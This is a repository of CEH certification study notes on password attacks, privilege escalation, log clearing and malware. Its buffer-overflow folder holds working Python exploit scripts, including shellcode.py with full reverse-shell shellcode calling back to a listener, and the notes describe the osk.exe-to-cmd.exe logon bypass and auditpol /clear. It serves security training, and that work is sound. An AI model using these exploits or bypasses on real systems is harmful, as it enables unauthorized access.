├── .gitattributes
├── Module 05 - Vulnerability Analysis
│   └── CEH Module 5 - Vulnerability Analysis.md
├── Module 06 - System Hacking
│   ├── CEH Module 6 - System Hacking.md
│   └── buffer
│       ├── Buffer Instructions.md
│       ├── badchars.py
│       ├── fuzzing.py
│       ├── offset.py
│       ├── shellcode.py
│       └── verify DLL address.py
├── Module 07 - Malware Threats
│   ├── CEH Module 7 - Malware Threats.md
│   └── Virus Programming.pdf
├── Module 08 - Sniffing
│   └── CEH Module 8 - Sniffing.md
├── Module 09 - Social Engineering
│   └── 09_Social_Engineering.md
├── Module 1 :-: Introduction.md
├── Module 10 - DOS and DDOS
│   └── 10_Denial_of_Services.md
├── Module 11 - Session Hijacking
│   └── Session Hijacking.md
├── Module 12 - Evading IDS, Firewall and HoneyPots
│   └── Module 12 - IDS, FIREWALL AND HONEYPOTS.pdf
├── Module 13 - Hacking web Servers
│   └── 13_Hacking_Web_Servers.md
├── Module 14 - Web Application
│   └── 14_Hacking_Web_Applications.md
├── Module 15 - SQL Injection
│   └── 15_SQL_Injection.md
├── Module 16 - Wireless Networks
│   ├── 16_Hacking_Wireless_Networks.md
│   └── Infographic_20_years_of_Wi-Fi_0.pdf
├── Module 17 - Mobile Platform
│   └── 17_Hacking_Mobile_Platforms.md
├── Module 18 - IOT Hacking
│   └── 18_IoT_Hacking.md
├── Module 19 - Cloud Computing
│   └── 19_Cloud_Computing.md
├── Module 2 :-: FootPrinting.md
├── Module 20 - Cryptography
│   └── 20_Cryptography.md
├── Module 3 :-: Network Scanning.md
├── README.md
└── _config.yml

--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto

--------------------------------------------------------------------------------
/Module 05 - Vulnerability Analysis/CEH Module 5 - Vulnerability Analysis.md:
--------------------------------------------------------------------------------
# Vulnerability Assessment/Research
Vulnerability Assessment is the process of examination, discovery and identification of a system's and its applications' security measures and
weaknesses. It helps to recognize the vulnerabilities that could be exploited, the need for additional security layers, and the information that scanners can reveal.
--------------------------------
# Vulnerability Assessment Life-Cycle
- Discover: discover vulnerabilities
- Prioritize: prioritize vulnerabilities by target, impact, loss value, business impact, etc.
- Report: prepare a report on the vulnerabilities
- Remediate: take appropriate preventive actions
- Verify: verify whether the vulnerability is actually resolved
- Monitor: monitor network traffic and system behaviour for any further intrusion
--------------------------------------------------------------------------------------------------
# Vulnerability Scoring System - CVSS (Common Vulnerability Scoring System) -> CVE-CWE
- Common Vulnerability Scoring System (CVSS v2.0)
  - Low: 0.0 - 3.9
  - Medium: 4.0 - 6.9
  - High: 7.0 - 10.0

- Common Vulnerability Scoring System (CVSS v3.0)
  - None: 0.0 (informational)
  - Low: 0.1 - 3.9
  - Medium: 4.0 - 6.9
  - High: 7.0 - 8.9
  - Critical: 9.0 - 10.0
--------------------------------------------------------------------------------------------------
# Common Vulnerabilities and Exposures (CVE) - Whenever a vulnerability is disclosed publicly it is identified by its CVE number.
- Platforms to find information about vulnerabilities
  - https://nvd.nist.gov/
  - https://cve.mitre.org/
  - https://exploit-db.com/
--------------------------------------------------------------------------------------------------
# Vulnerability Scanners
Vulnerability scanners are automated utilities to detect vulnerabilities.
They are capable of:
- OS detection and version detection
- Listing installed applications
- Finding accounts with weak passwords
- Finding missing patches
- Finding weak/misconfigured network services and risky open ports
These scanning tools perform deep inspection of scripts, open ports, banners, running services, configuration errors, etc.

# Top scanners:
- Nmap scripts (NSE categories: vuln, discovery, safe, etc.)
- Nikto
- wpscan
- Acunetix
- Nessus
- Qualys Free Scan
- Crashtest - https://crashtest.cloud/login
--------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Module 06 - System Hacking/CEH Module 6 - System Hacking.md:
--------------------------------------------------------------------------------
# Methods for System Hacking

- Cracking passwords
- Exploiting services, installed applications or the OS
- Malicious applications

-------------------------------------------------------------------------------------------------

# Password Cracking - Password cracking is the method of recovering a password in order to gain unauthorized access to the target system while appearing to be a legitimate user

Three types of authentication factors:

- Authentication using username and password (something you know)
- Authentication using biometrics such as a fingerprint or retina scan (something you are)
- Only authorized devices are allowed to connect, e.g. by filtering on MAC address (something you have)

------------------------------------------------

# Characteristics of a Secure Password

- Mixed-case letters
- Special characters
- Numbers
- Length (more than 8 characters)
- Pass-phrases

------------------------------------------------

# Types of Password Attacks

# Non-Electronic Attacks - Do not require any technical understanding or knowledge.
Examples:
- Shoulder surfing
- Dumpster diving
- Eavesdropping
- Vishing (voice phishing)

# Active Online Attacks - Directly interact with the target to crack the password

- Dictionary/Wordlist Attack - The attacker uses a preconfigured wordlist (of usernames or passwords) to gain access to the victim's account.
- Brute Force Attack - The attacker tries every possible combination of characters to gain access to the victim's account.
- Hash Injection - Performed after gaining access to a system. The attacker extracts the stored password hashes and either injects a captured hash into a local session to authenticate as that user (pass-the-hash) or cracks the hashes offline.
  Hash locations: the SAM (Security Account Manager) database on Windows, C:\Windows\System32\config\SAM, and the shadow file on Linux, /etc/shadow.

# Passive Online Attacks - Performed without interfering with the target

- Wire Sniffing - The attacker sniffs network traffic and extracts sensitive information such as Telnet, FTP or SMTP credentials sent in plaintext.
- Man-in-the-Middle (MITM) Attack - The attacker inserts himself into the communication between two parties and relays it, reading or altering it on the way.
  MITM tools:
  - xerosploit --> Ettercap --> Bettercap
  - Browser Exploitation Framework (BeEF-XSS) - hooks browsers through XSS; works best against older browsers without XSS protection

# Default Passwords - Default passwords are set by the developer or manufacturer. The attacker tries those passwords to gain access.

# Password Guessing - The attacker uses the information gathered in the earlier phases (footprinting, enumeration) to guess the password

# USB Drive - The attacker plugs in a USB drive containing a password-hacking tool. The Windows Autorun feature, if enabled, runs the application automatically

# Password Cracking Techniques for Windows Devices
- Create a bootable Windows/Linux USB drive.
- Open CMD with Shift+F10 from the Windows boot media, or open a terminal in Linux
- For Windows, type the commands below:
  --> diskpart                 // Open the disk-partition tool
  --> list volume              // List partitions and drive letters of the connected storage drives
  --> exit                     // Exit diskpart (not CMD)
  --> C:                       // Switch to drive C:
  --> dir                      // List files and folders on C:. If the Windows and Program Files folders are there, good; otherwise try D:, E:, F:, ...
  --> cd Windows               // Enter the Windows folder
  --> cd System32              // Enter the System32 folder
  --> ren osk.exe osk1.exe     // Rename the On-Screen Keyboard binary osk.exe to osk1.exe
  --> copy cmd.exe osk.exe     // Put a copy of CMD.EXE in its place under the name OSK.EXE
  ///// Exit ///// Reboot ///// On the logon screen, launch the On-Screen Keyboard from the Accessibility menu; a SYSTEM command prompt opens instead
  --> net user                 // List the users on the system
  --> net user Babu_Bhai *     // Change the password of user "Babu_Bhai"; the asterisk (*) makes net user prompt for the new password
  --> net user Abcd /add       // Create a user named Abcd

# Password Cracking Mitigation
- Change default passwords.
- Do not store/save passwords in applications.
- Do not use guessable passwords.
- Store passwords as salted hashes.
- Change passwords on a weekly/monthly basis.
- Use a different password for each service.
- Configure lockout policies for repeated incorrect password attempts.

-------------------------------------------------------------------------------------------------

# Escalating Privileges - Privilege escalation is the process of gaining the privileges of another user.

- Horizontal Privilege Escalation - The attacker attempts to gain access to another user with the same set of privileges.

- Vertical Privilege Escalation - The attacker tries to gain access to a user with a higher set of privileges.
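The dictionary and brute-force attacks described under Active Online Attacks, and the "store passwords as salted hashes" mitigation, are easier to reason about when you see the cost of each guess. The following is an added example (not code from the CEH-Notes repo): an offline dictionary attack and an exhaustive brute force against a captured unsalted SHA-256 hash, beside the salted PBKDF2 storage that defeats precomputed tables and slows every guess. The wordlist and the "captured" hashes are constructed for the demonstration; SHA-256 stands in for whatever hash the target actually used.

```python
"""Offline password attacks and the salted-hash defence.

Added example, not part of the CEH-Notes repo. The wordlist and the captured
hashes below are constructed; 'sha256' stands in for the target's algorithm.
"""
import hashlib
import hmac
import itertools
import os
import string

# Constructed wordlist, standing in for a file such as rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "letmein", "password123", "admin"]


def sha256_hex(text):
    """Unsalted fast hash, the weak storage format being attacked."""
    return hashlib.sha256(text.encode()).hexdigest()


def dictionary_attack(target_hash, wordlist=WORDLIST):
    """One hash per candidate word; returns the match or None."""
    for word in wordlist:
        if hmac.compare_digest(sha256_hex(word), target_hash):
            return word
    return None


def brute_force(target_hash, charset=string.ascii_lowercase + string.digits, max_len=4):
    """Exhaust every combination up to max_len. Work grows as len(charset)**n,
    which is why length beats complexity in the 'secure password' list."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            candidate = "".join(combo)
            if hmac.compare_digest(sha256_hex(candidate), target_hash):
                return candidate
    return None


def keyspace(charset_size, length):
    """Number of guesses a full brute force of a fixed length needs."""
    return charset_size ** length


# --- the mitigation: salted, deliberately slow hashes -------------------------

def store_password(password, iterations=200_000):
    """Return (salt, digest). A random 16-byte salt makes identical passwords
    hash differently and defeats precomputed tables; PBKDF2's iteration count
    makes each attacker guess as slow as a legitimate login."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password, salt, stored_digest, iterations=200_000):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(digest, stored_digest)


if __name__ == "__main__":
    leaked = sha256_hex("password123")            # constructed 'captured' hash
    print("dictionary hit:", dictionary_attack(leaked))
    print("brute force hit:", brute_force(sha256_hex("ab1"), max_len=3))
    print("8 chars, 62-symbol alphabet:", keyspace(62, 8), "guesses")
    salt, digest = store_password("correct horse battery staple")
    print("verify:", verify_password("correct horse battery staple", salt, digest))
```

The same dictionary attack runs unchanged against a salted hash, but the attacker must repeat it per user instead of once per leaked database, and with PBKDF2 at 200,000 iterations each guess costs roughly that many hash operations instead of one; the lockout policy in the mitigation list is what stops the online variant, where the target itself does the hashing.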
-------------------------------------------------------------------------------------------------

# Keyloggers

- Keyloggers are malicious software that capture your keystrokes.

# Anti-Keyloggers

- An anti-keylogger is an application that protects against keylogging by providing SSL protection, keystroke-logging protection, clipboard-logging protection and screen-logging protection.

# Key-logging Countermeasures

- Don't click on doubtful URLs
- Use an on-screen keyboard for secrets
- Physical monitoring (check for hardware keyloggers)
- Host-based IDS
- Scan files prior to installation

# Adware - Adware is malicious software that shows advertisements to the victim, chosen by inspecting his actions and interests

# Spyware - Spyware is malicious software that captures your keystrokes, screen, camera, microphone, location, etc.

Features:

- Tracking users (i.e. keylogging)
- Voice recording
- Video recording

-------------------------------------------------------------------------------------------------

# File Systems

- New Technology File System (NTFS) is Microsoft's Windows file system and the default for Windows 10, 7, Vista, XP, 2000 and NT. Its Alternate Data Streams (ADS) let data be attached to a file in a stream that ordinary directory listings do not show.

- File Allocation Table (FAT) is a simple file system originally designed for small disks and simple folder structures.

- Extended File System (Ext) is the first file system created specifically for the Linux kernel.

-------------------------------------------------------------------------------------------------

# Steganography - Steganography is a technique for hiding sensitive information inside an ordinary message (the carrier) to ensure confidentiality. Unlike encryption, it hides the existence of the data rather than its content; in practice the payload is often encrypted first, so that the data stays confidential even if the carrier is detected.
An attacker may use this technique to transfer data without being detected.
Examples of Steganography:
- Image/Pixel Steganography - The hidden information is kept in image files of different formats such as PNG, JPG, BMP, etc.
- Video Steganography - Hiding information in video files.
- Audio Steganography - Hiding information in audio files.

-------------------------------------------------------------------------------------------------

# Covering tracks - After gaining access, escalating privileges and executing applications, the next step is to wipe the digital footprints that could reveal the attacker's identity. In this phase the attacker removes event logs, error messages and other evidence to prevent the attack from being discovered easily

Common techniques:

- Disable auditing
  Auditing is enabled on a system to detect and track events. Disabling it as soon as you log in prevents the system from recording events and keeps other security mechanisms from raising an alert about the intrusion, so no tracks are left on the machine.
- Clearing logs - By clearing the logs, all events recorded during the compromise are erased.
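Seen from the defender's side, both techniques above leave their own trace: Windows writes Security event 1102 when the Security log is cleared, 4719 when the system audit policy changes, and, with command-line auditing enabled, 4688 for each process start including the command line of `auditpol` or `wevtutil`. The following is an added example (not from the CEH-Notes repo) that runs that detection logic over a few constructed Security-log records exported as JSON lines; the field names and values are modelled on the real events but are constructed here, not real log data.

```python
"""Detecting the 'covering tracks' steps from the Windows Security log.

Added example, not part of the CEH-Notes repo. SAMPLE_EVENTS are constructed
records modelled on Security-log fields: 4624 (logon), 4688 (process created,
with the CommandLine field that 'Include command line in process creation
events' adds), 4719 (system audit policy changed), 1102 (audit log cleared).
"""
import json
import re

SAMPLE_EVENTS = r"""
{"time": "2024-05-01T10:00:03Z", "id": 4624, "user": "alice", "data": {"LogonType": "2"}}
{"time": "2024-05-01T10:02:11Z", "id": 4688, "user": "alice", "data": {"NewProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}}
{"time": "2024-05-01T10:05:40Z", "id": 4688, "user": "bob", "data": {"NewProcessName": "C:\\Windows\\System32\\auditpol.exe", "CommandLine": "auditpol /clear /y"}}
{"time": "2024-05-01T10:05:41Z", "id": 4719, "user": "bob", "data": {"Category": "System", "AuditPolicyChanges": "Success removed, Failure removed"}}
{"time": "2024-05-01T10:06:02Z", "id": 4688, "user": "bob", "data": {"NewProcessName": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil cl Security"}}
{"time": "2024-05-01T10:06:03Z", "id": 1102, "user": "bob", "data": {}}
"""

# Command lines that wipe or silence auditing (the steps listed in the notes).
TRACK_COVERING_CMDS = [
    (re.compile(r"\bauditpol(\.exe)?\s+/clear\b", re.I), "auditpol /clear: audit policy wiped"),
    (re.compile(r"\bauditpol(\.exe)?\s+/set\b.*\bdisable\b", re.I), "auditpol /set ... disable: auditing turned off"),
    (re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I), "wevtutil cl: event log cleared"),
]


def parse_events(text):
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return [(time, user, finding)] for anti-forensic activity, in log order."""
    findings = []
    for ev in events:
        eid, data = ev["id"], ev.get("data", {})
        if eid == 1102:
            findings.append((ev["time"], ev["user"], "1102: Security log was cleared"))
        elif eid == 4719:
            findings.append((ev["time"], ev["user"], "4719: system audit policy changed"))
        elif eid == 4688:
            cmd = data.get("CommandLine", "")
            for pattern, label in TRACK_COVERING_CMDS:
                if pattern.search(cmd):
                    findings.append((ev["time"], ev["user"], "4688: " + label))
                    break
    return findings


if __name__ == "__main__":
    for time, user, finding in detect(parse_events(SAMPLE_EVENTS)):
        print(time, user, finding)
```

Two caveats a practitioner would add. The 1102 record is written into the very log that was just cleared, and an attacker with administrative rights can clear it again or stop the service, so these detections only hold up when events are forwarded to a collector the attacker cannot reach. And `auditpol /clear` disables the policy from that point on, so the absence of expected events (no 4624 logons for hours on a busy host) is itself a signal worth alerting on.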
# Disable auditing policies

- List the auditing categories in Windows:
  C:\Windows\system32>auditpol /list /category

- Show the current audit policy for every category:
  C:\Windows\system32>auditpol /get /category:*

- Enable auditing for the System and Account Logon categories:
  C:\Windows\system32>auditpol /set /category:"System","Account Logon" /success:enable /failure:enable

- Enable success auditing for all categories:
  C:\Windows\system32>auditpol /set /category:* /success:enable

- Clear the audit policy (what an attacker covering tracks runs):
  C:\Windows\system32>auditpol /clear /y

# Clearing logs
Folders of log files:
- Windows 2000/Server 2003/Windows XP: %SystemRoot%\System32\Config (*.evt)
- Server 2008/Vista and later: %SystemRoot%\System32\winevt\Logs (*.evtx)
- Linux, OpenBSD: /var/log/

--------------------------------------------------------------------------------
/Module 06 - System Hacking/buffer/Buffer Instructions.md:
--------------------------------------------------------------------------------
# Connect the application to the debugger
# Use the spiking script with the command
- generic_send_tcp
- generic_send_tcp 1.1.1.14 9999 spiking.spk 0 0
# Use the fuzzing script to find the crash length, then a cyclic pattern to identify the offset
- msf-pattern_create -l
- msf-pattern_offset -l -q
# Find Bad Characters
**\x00 is a well-known bad character, so it is not listed here.**
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14 \x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28 \x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c \x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50 \x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64 \x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78
\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c \x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0 \xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4 \xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8 \xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc \xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0 \xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

# Identify a usable module with mona
- !mona modules (pick a module with Rebase, SafeSEH and ASLR all False and no bad characters in its address range)
- !mona find -s "\xff\xe4" -m (\xff\xe4 is the opcode of JMP ESP)
- Write the address in little-endian byte order, because x86 stores the least significant byte first: the address 0x68a98a7b is sent as \x7b\x8a\xa9\x68
# Create shell
- msfvenom -p windows/meterpreter_reverse_tcp lhost= lport= -f c -a x86 -b

--------------------------------------------------------------------------------
/Module 06 - System Hacking/buffer/badchars.py:
--------------------------------------------------------------------------------
import sys
import socket

# Every byte from \x01 to \xff; \x00 is assumed bad and left out. The literal is
# wrapped in parentheses so the implicit concatenation yields one value (without
# them only the first line was assigned to badchars and the rest were discarded).
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# junk = padding up to the saved return address (offset 1052, found with offset.py)
#        + 4 bytes that land in EIP + the candidate bad characters, which end up
#        at ESP where they can be compared byte by byte in the debugger.
junk = b"A" * 1052 + b"B" * 4 + badchars

# Establish the connection and send the junk
try:
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect(("127.0.0.1", 8888))
    conn.send(junk)
    conn.close()
except Exception as error:
    print("Error occurred: " + str(error))
    sys.exit(1)

--------------------------------------------------------------------------------
/Module 06 - System Hacking/buffer/fuzzing.py:
--------------------------------------------------------------------------------
import sys
import socket
from time import sleep

junk = b"A" * 1000

# Keep sending a growing buffer until the service stops answering; the last
# printed size is roughly where it crashed (watch EIP in the debugger).
while True:
    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.settimeout(3)
        conn.connect(("127.0.0.1", 8888))
        conn.send(junk)
        conn.close()
        print("Junk size is: " + str(len(junk)))
        sleep(1)
        junk = junk + b"A" * 50
    except Exception as error:
        print("Error occurred after " + str(len(junk)) + " bytes: " + str(error))
        sys.exit(1)

--------------------------------------------------------------------------------
/Module 06 - System Hacking/buffer/offset.py:
--------------------------------------------------------------------------------
import sys
import socket

# Cyclic pattern from msf-pattern_create: every 4-byte window is unique, so the
# value left in EIP after the crash tells us how far into the buffer the saved
# return address sits.
junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk"

# Establish the connection and send the pattern
try:
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect(("127.0.0.1", 8888))
    conn.send(junk)
    conn.close()
except Exception as error:
    print("Error occurred: " + str(error))
    sys.exit(1)

## EIP after the crash = 316A4230, i.e. the pattern bytes "0Bj1" read little-endian
## msf-pattern_offset -q 316A4230 -> Offset = 1052

--------------------------------------------------------------------------------
/Module 06 - System Hacking/buffer/shellcode.py:
--------------------------------------------------------------------------------
import socket

target = "127.0.0.1"

# Padding up to the saved return address (offset 1052 from offset.py)
junk = b"A" * 1052

# Address of a JMP ESP in Qt5Core.dll, 0x68a98a7b, written in little-endian byte order
eip = b"\x7B\x8A\xA9\x68"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c
# Generated without -b "\x00", so it still contains NUL bytes (e.g. \xe8\x82\x00\x00\x00).
# If the target treats the input as a C string, regenerate with -b "\x00" (which adds an
# encoder) and put a short NOP sled (b"\x90" * 16) in front of the decoder stub.
shellcode = (b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
             b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
             b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
             b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
             b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
             b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
             b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
             b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
             b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
             b"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
             b"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
             b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
             b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x02\x01\x68"
             b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
             b"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
             b"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
             b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
             b"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
             b"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
             b"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
             b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
             b"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

# padding | overwritten return address -> JMP ESP | shellcode (now at ESP)
payload = junk + eip + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 8888))
s.send(payload)
s.close()

--------------------------------------------------------------------------------
/Module 06 - System Hacking/buffer/verify DLL address.py:
--------------------------------------------------------------------------------
import sys
import socket

# Overwrite EIP with the JMP ESP address only. Set a breakpoint on 0x68a98a7b in
# the debugger first and confirm execution stops there before adding shellcode.
junk = b"A" * 1052 + b"\x7b\x8a\xa9\x68"

# Establish the connection and send the junk
try:
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect(("127.0.0.1", 8888))
    conn.send(junk)
    conn.close()
except Exception as error:
    print("Error occurred: " + str(error))
    sys.exit(1)

## JMP ESP address as shown in the debugger = 0x68a98a7b
## The same address in little-endian byte order, as it must be sent = \x7b\x8a\xa9\x68

--------------------------------------------------------------------------------
/Module 07 - Malware Threats/CEH Module 7 - Malware Threats.md:
--------------------------------------------------------------------------------
# Basic
Malware = **Mal**icious Soft**ware** - software designed to harm systems or obtain sensitive information.
Malware is an umbrella term for a wide variety of potentially harmful software.

# Malware propagation ways
- Free software (crack files, ...)
- File sharing services: the file can be infected during the transfer (torrent, ...)
- Removable media (firmware-embedded malware, ...)
- Email (attachments, ...)
- Not using a firewall or anti-virus
--------------------------------------------------------------------------------------------------
# Trojan
A Trojan misleads the user about its true intent and waits for the best moment to act. Typically spread by social engineering.
Most common uses:
- Create a back door
- Gain unauthorized access
- Steal information
- Infect connected devices
- Ransomware attacks
- Enroll the victim in a botnet
- Download other malicious software
- Disable security controls

# Types of Trojans
# Command Shell Trojans
- Command Shell Trojans provide remote control of a command shell.
